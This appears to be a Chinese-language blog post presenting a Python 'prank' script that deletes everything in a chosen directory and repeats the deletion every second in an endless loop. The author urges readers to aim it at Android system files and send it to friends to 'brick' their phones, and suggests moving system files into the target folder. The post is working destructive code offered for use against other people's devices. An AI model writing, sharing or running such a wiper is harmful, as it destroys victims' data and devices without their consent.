之前我们学习了Python的爬虫及反爬技术,今天我们就来了一个恶作剧程序!
这里主要涉及到Python的os,time,shutil这几个库
作用:它可以重复删除指定目录内的所有文件,千万不要小瞧这个功能,如果你指定的目录是像手机安卓这样的系统文件的话,将这个程序发给你的好友,不知道多少应用要中招,他的手机就可以变砖块了!哈哈!
好的我们直接看源码!
import os
#导入OS
import shutil
#导入shutli
import time
#导入time模块,用于时间延迟,不然电脑性能不够def delete_contents(directory):# 确保目录存在if not os.path.exists(directory):print(f"The directory {directory} does not exist.")return# 遍历目录中的所有文件和子目录for filename in os.listdir(directory):file_path = os.path.join(directory, filename)try:# 如果是文件,直接删除if os.path.isfile(file_path) or os.path.islink(file_path):os.unlink(file_path)# 如果是目录,递归删除elif os.path.isdir(file_path):shutil.rmtree(file_path)except Exception as e:print(f'Failed to delete {file_path}. Reason: {e}')def repeat_delete(directory, interval):while True:delete_contents(directory)print(f"Deleted contents of {directory}. Waiting for {interval} seconds...")time.sleep(interval)# 使用函数重复删除指定目录下的所有内容,每5分钟执行一次
repeat_delete('这里输入你目录的路径', 1) # 延迟一秒,当然可以缩短时间
运行试一试吧!手机内运行也可以!
可以将系统文件移动到你所指定的目录哟!哈哈!!